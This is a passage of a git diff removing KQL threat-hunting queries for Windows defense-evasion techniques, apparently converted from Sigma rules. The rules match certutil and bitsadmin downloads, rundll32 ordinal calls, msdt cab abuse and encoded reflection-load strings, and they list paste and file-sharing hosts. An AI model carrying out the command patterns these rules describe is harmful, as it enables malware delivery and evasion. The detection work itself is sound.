-| where (ProcessCommandLine contains "LINK /" and FolderPath endswith "\\link.exe") and (not((InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql b/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql
deleted file mode 100644
index e86795a7..00000000
--- a/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/16
-// Level: medium
-// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath endswith "\\ntvdm.exe" or FolderPath endswith "\\csrstub.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspect_Svchost_Activity.kql b/Defense Evasion/Suspect_Svchost_Activity.kql
deleted file mode 100644
index 0c14e8e3..00000000
--- a/Defense Evasion/Suspect_Svchost_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: David Burkett, @signalblur
-// Date: 2019/12/28
-// Level: high
-// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql b/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql
deleted file mode 100644
index dc599be6..00000000
--- a/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/17
-// Level: high
-// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "advpack" and ((ProcessCommandLine contains "#+" and ProcessCommandLine contains "12") or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql b/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql
deleted file mode 100644
index 48c1c2d1..00000000
--- a/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
-// Date: 2022/12/24
-// Level: high
-// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath endswith "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\" or ProcessCommandLine contains "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql b/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql
deleted file mode 100644
index 1407fd7f..00000000
--- a/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications" and (RegistryKey contains "\\Users\\Public" or RegistryKey contains "\\AppData\\Local\\Temp" or RegistryKey contains "\\Desktop" or RegistryKey contains "\\PerfLogs" or RegistryKey contains "\\Windows\\Temp")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql b/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql
deleted file mode 100644
index 55cd2a6a..00000000
--- a/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113
-// Date: 2022/06/21
-// Level: medium
-// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -cab " or ProcessCommandLine contains " /cab ") and (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Calculator_Usage.kql b/Defense Evasion/Suspicious_Calculator_Usage.kql
deleted file mode 100644
index 70fa9441..00000000
--- a/Defense Evasion/Suspicious_Calculator_Usage.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/02/09
-// Level: high
-// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\calc.exe " or (FolderPath endswith "\\calc.exe" and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Call_by_Ordinal.kql b/Defense Evasion/Suspicious_Call_by_Ordinal.kql
deleted file mode 100644
index 951412c5..00000000
--- a/Defense Evasion/Suspicious_Call_by_Ordinal.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/22
-// Level: high
-// Description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains ".dll #" or ProcessCommandLine contains ".ocx #") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not(((ProcessCommandLine contains "EDGEHTML.dll" and ProcessCommandLine contains "#141") or ((ProcessCommandLine contains "\\FileTracker32.dll,#1" or ProcessCommandLine contains "\\FileTracker32.dll\",#1" or ProcessCommandLine contains "\\FileTracker64.dll,#1" or ProcessCommandLine contains "\\FileTracker64.dll\",#1") and (InitiatingProcessFolderPath contains "\\Msbuild\\Current\\Bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" or InitiatingProcessFolderPath contains "\\Tracker.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql b/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql
deleted file mode 100644
index d6006a54..00000000
--- a/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: high
-// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql b/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql
deleted file mode 100644
index b25dfd18..00000000
--- a/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/14
-// Level: high
-// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055, attack.t1036
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql b/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql
deleted file mode 100644
index 473e7753..00000000
--- a/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/14
-// Level: high
-// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe".
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\notepad.exe") or (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Roaming\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\")) and InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql b/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql
deleted file mode 100644
index 595debb6..00000000
--- a/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019/10/14
-// Level: medium
-// Description: Detects a code page switch in command line or batch scripts to a rare language
-// Tags: attack.t1036, attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " 936" or ProcessCommandLine endswith " 1258") and FolderPath endswith "\\chcp.com"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql b/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql
deleted file mode 100644
index 02f15c71..00000000
--- a/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/04/15
-// Level: high
-// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\System32\\control.exe") and (not(ProcessCommandLine contains "Shell32.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql b/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql
deleted file mode 100644
index e11f3a48..00000000
--- a/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/07/03
-// Level: medium
-// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.
-Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
-
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql b/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql
deleted file mode 100644
index a0619d77..00000000
--- a/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/21
-// Level: high
-// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
-// Tags: attack.defense_evasion, attack.t1564
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\colorcpl.exe" and (not((FolderPath endswith ".icm" or FolderPath endswith ".gmmp" or FolderPath endswith ".cdmp" or FolderPath endswith ".camp")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Csi.exe_Usage.kql b/Defense Evasion/Suspicious_Csi.exe_Usage.kql
deleted file mode 100644
index ea5c49ee..00000000
--- a/Defense Evasion/Suspicious_Csi.exe_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020/10/17
-// Level: medium
-// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
-// Tags: attack.execution, attack.t1072, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_CustomShellHost_Execution.kql b/Defense Evasion/Suspicious_CustomShellHost_Execution.kql
deleted file mode 100644
index b82c76dd..00000000
--- a/Defense Evasion/Suspicious_CustomShellHost_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe'
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\CustomShellHost.exe" and (not(FolderPath =~ "C:\\Windows\\explorer.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql b/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql
deleted file mode 100644
index 6a1909b6..00000000
--- a/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: high
-// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and (ProcessCommandLine contains "\\Appdata\\Local\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Tasks\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql b/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql
deleted file mode 100644
index 69f6a7aa..00000000
--- a/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/26
-// Level: medium
-// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Double_Extension_Files.kql b/Defense Evasion/Suspicious_Double_Extension_Files.kql
deleted file mode 100644
index 0ef9f5c1..00000000
--- a/Defense Evasion/Suspicious_Double_Extension_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022/06/19
-// Level: high
-// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
-// Tags: attack.defense_evasion, attack.t1036.007
-DeviceFileEvents
-| where (FolderPath endswith ".rar.exe" or FolderPath endswith ".zip.exe") or ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and (FolderPath endswith ".exe" or FolderPath endswith ".iso" or FolderPath endswith ".rar" or FolderPath endswith ".zip"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql b/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql
deleted file mode 100644
index 194705f0..00000000
--- a/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql b/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql
deleted file mode 100644
index b4aa432b..00000000
--- a/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file from a suspicious domain
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql
deleted file mode 100644
index 9ce127d5..00000000
--- a/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: medium
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_DumpMinitool_Execution.kql b/Defense Evasion/Suspicious_DumpMinitool_Execution.kql
deleted file mode 100644
index d77e0e31..00000000
--- a/Defense Evasion/Suspicious_DumpMinitool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/06
-// Level: high
-// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) and ((not((FolderPath contains "\\Microsoft Visual Studio\\" or FolderPath contains "\\Extensions\\"))) or ProcessCommandLine contains ".txt" or ((ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and (not(ProcessCommandLine contains "--dumpType"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql b/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql
deleted file mode 100644
index c8bc79a5..00000000
--- a/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/03/01
-// Level: high
-// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql b/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql
deleted file mode 100644
index 700cfc45..00000000
--- a/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/20
-// Level: high
-// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey contains "\\Environment"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql b/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql
deleted file mode 100644
index b126c478..00000000
--- a/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105
-// Date: 2019/09/26
-// Level: high
-// Description: Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).
-// Tags: attack.defense_evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002
-DeviceProcessEvents
